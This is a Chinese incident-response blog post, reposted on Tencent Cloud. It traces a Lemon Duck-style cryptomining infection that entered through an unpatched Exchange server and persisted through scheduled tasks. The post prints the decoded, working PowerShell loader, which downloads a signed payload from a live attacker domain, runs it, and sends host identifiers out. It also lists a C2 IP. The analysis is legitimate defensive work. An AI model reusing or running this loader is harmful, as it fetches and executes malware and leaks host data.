前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >应急实战 | 记一次日志缺失的挖矿排查

应急实战 | 记一次日志缺失的挖矿排查

作者头像
安全小王子
发布2021-09-23 16:58:41
9900
发布2021-09-23 16:58:41
举报
文章被收录于专栏:betasecbetasec

  • “你那边什么情况,有点像哈希传递。”
  • “被挖矿了,但是这边的运维重装过主机。”
  • “我去,截下来样本没,排查完了吗?”
  • “一部分日志和样本截留下来了,但是还没排查完,帮忙看看怎么进来。”

PS:以下数据已经脱敏,聊天记录不会截图,只分享经验和思路,这是一次条件极为有限的排查。 0x01 确认到手情报 首先来看一下,同事手上有啥情报。

  • 1.在被感染主机上发现计划任务。
  • 2.拉取了主机上web日志,发现存在哈希传递。
  • 3.powershell下提取到了攻击样本。
  • 4.感染了10台左右主机,已经重装系统。
  • 5.暂时认定邮件系统为打击入口。

好吧,其实问题不大。【都被清光了】,我过去只是大概还原一下攻击过程、清理痕迹和写报告。 0x02 分析攻击行为 康康到底是咋回事,接下来一条一条情报来分析。 天融信的设备发出的告警如下: 一、确认打击点、利用点 1.常规排查 网络外连情况:无特殊情况。 开机启动项情况:没有自动项 最近启动程序情况:没有乱码程序启动 windows安全日志情况: 无新增用户、没有日志都是登陆,注销日志没有异常 2.计划任务排查: 计划任务名称:backball、backball1 启动路径结合下面的web日志可以看出是powershell下的一个乱码程序 触发器:在首次触发后,无限期地每隔02:00:00重复一次。 3.web日志 在web日志中,可以看见大量的POST请求,访问的是exchage邮件服务器。并且通过mailbox字段可以知道,已经泄露出了一个邮箱,攻击者应该就是从这里进来的。 二、还原攻击过程 三、攻击样本分析 1.先看沙箱分析 沙箱中已经存在这种恶意文件,也就是说之前有人提交过。 (1)发现一个外连地址 1.117.58.154,被标红了。 (2)该恶意文件可以检查宿主机的内存和网络接口,以此反虚拟机。 (3)开启端口并监听,获取系统时间。 2.powershell分析 其实只分析那个Powershell就够了,ps1文件解码出来太大了,如果需要请私信我。 解码后的ps1文件: powershell -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('xpVT7bCpITDUjAvmzli55WPVFPjQBos7o9/ZbbWzyeaKIn9NLJwvY6ad3rMGoXzT6mz+51VupKm5TQvk79oVK4QQDZErhr0szpUdW79j2WPhbmpZrwMdgmFHrqG6Np+InWy/V1acp09/W9x54mpQ1EHIos1+JhSrYPaq8WtsGW0=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.jus'+'anrihua.com';a($url+'/a.jsp?rep_20210713?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*')) 大概就是:从这里能看出来大部分东西了,生成的exe也是能被杀的,分析也没啥意义 0x03 总结 通过分析得出,因为该服务器的exchange版本过低且没有进行补丁更新。被攻击者成功利用最近的exchange漏洞攻入,并利用计划任务的方法达到定时启动恶意挖矿程序和不死属性驻留主机。 通过特征可以溯源出是cs的powershell马,然后将其解码可以知道它的行为。 因为缺乏全流量设备的支撑,无法获取dns解析记录、相关IPS日志等监控记录,部分Windows日志也被重装丢失掉,只能到此为止。 相关链接: //国外相关分析 https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html //github记录木马表格 https://github.com/sophoslabs/IoCs/blob/master/Trojan-LDMiner.csv //沙箱分析记录 https://s.threatbook.cn/report/file/fae6a3a4e5b11cdc8a982798167de4c1aafd101cc8726ba520c420d1ef381a9d/?env=win7_sp1_enx64_office2013 //powershell混淆解码 https://www.freebuf.com/articles/system/181697.html //解码ps1 https://www.powershellgallery.com/packages/PowerSploit/3.0.0.0/Content/CodeExecution%5CInvoke-ReflectivePEInjection.ps1

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2021-09-06,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 betasec 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
区块链
云链聚未来,协同无边界。腾讯云区块链作为中国领先的区块链服务平台和技术提供商,致力于构建技术、数据、价值、产业互联互通的区块链基础设施,引领区块链底层技术及行业应用创新,助力传统产业转型升级,推动实体经济与数字经济深度融合。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档